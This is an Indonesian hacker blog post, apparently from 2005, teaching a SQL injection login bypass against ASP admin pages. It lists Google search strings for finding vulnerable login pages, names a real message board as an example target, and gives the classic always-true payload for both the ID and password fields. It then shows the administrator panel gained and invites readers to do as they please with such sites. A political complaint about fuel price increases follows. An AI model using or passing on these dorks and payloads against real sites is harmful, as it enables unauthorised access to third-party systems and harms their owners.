Yang di maksud denngan SQL Injection ialah memasukkan kode² SQL untuk mendapatkan acces kedatabase yang lebih besar daripada yang seharusna kita dapatkan, terutama pada script yang tidak memvalidasi input dari user.
Sebenarna ini bug sudah lama sekali,tapi yang namana ilmu gak ada basina kan… 
gak usah banak omong langsung aja kepermasalahan.
pastikan komputer anda sudah connect internet hehehhee….
buka www.google.co.id
Masukkan kata kunci/keyword dibawah:
“/admin.asp”
“/login.asp”
“/logon.asp”
“/adminlogin.asp”
“/adminlogon.asp”
“/admin_login.asp”
“/admin_logon.asp”
“/admin/admin.asp”
“/admin/login.asp”
“/admin/logon.asp”
“/admin/adminlogin.asp”
“/admin/adminlogon.asp”
“/admin/admin_login.asp”
“/admin/admin_logon.asp”
“/administrator/admin.asp”
“/administrator/login.asp”
“/administrator/logon.asp”
“root/login.asp”
“admin/index.asp”
Nah disini saya mengambil contoh keyword ini: “/login.asp”
Dan hasil dari pencarian di google kita coba salah satu target.
miasl:http://board.i2.co.id/login.asp
disitu ada menu seperti ini:
BOARD ADMINISTRATOR
Silakan login terlebih dahulu untuk melakukan perubahan pada Message Board Anda
Community ID:
Password:
Langkah yang harus dilakukan login dengan:
Community ID:´or´´=´
Password:´or´´=´
Saturday, October 01, 2005
:: Normal view
:: Administrator View
:: Kustomisasi Tampilan
:: Preference
:: Ganti Password
:: Ubah Profil
:: Logout
ADMINISTRASI MESSAGE BOARD
Fasilitas ini dapat digunakan untuk melakukan adminsitrasi message board Anda. Anda dapat
menghapus pesan-pesan yang tidak diinginkan, atau mengunci sebuah posting sehingga tidak dapat
ditanggapi oleh peserta lain. Pesan yang dikunci ini tetap dapat dibaca secara normal.
Klik menu di samping untuk mulai melakukan administrasi board Anda.
©1997-2005 – Indonesia Interactive . Hak cipta dilindungi Undang-undang. Powered by:
Nah kalo kita login dan setelah itu keluar tampalian kek itu berarti kita berhasil.
Kalo sudah begitu mau diapain tuh web terserah kalian,tapi ingat jangan merusak.
Cukup untuk belajar,belajar dan belajar.
Buat webmaster yg websaitena jadi contoh maaf ya.(nemu di google seh)
Tulisan ini aku hadiahkan buat pemerintah kita,yang telah sukses menindas rakyatna,
dengan menaikan harga BBM yg luar biasa.
BBM jenis -premium naik dari 2.400 menjadi 4.500/liter (87%)
-Solar naik dari Rp 2100 menjadi Rp 4.300/liter (104%)
-Minyak tanah utk rumah tangga dan usaha kecil naik dari Rp 700 menjadi Rp 2.000/liter
(185%)
Dengan kenaikan harga BBM tersebut makin memberatkan beban rakyat menengah kebawah. Dulu sebelum menjadi presiden SBY pernah berjanji tidak akan menaikkan harga BBM,akan mensejahterakan rakyat,mengurangi pengangguran dll.
Tapi apa yang terjadi sekarang???????????
Belum ada 1 thn harga BBM naik 2x,pengangguran tambah banak,kesengsaraan rakyat makin meluas…….
Maaf kalo saya menulis kek gini,karena saya adalah rakyat jelata yang terkena imbas dari semua itu.
POM_PONK
contact:solohackerlinks@yahoo.com
thank´s to: PeNcOpEt_CiNtA #SOLOHACKERLINK allnet&dalnet #indonesiahack dalnet
0 Responses to “SQL Injection for admin.asp”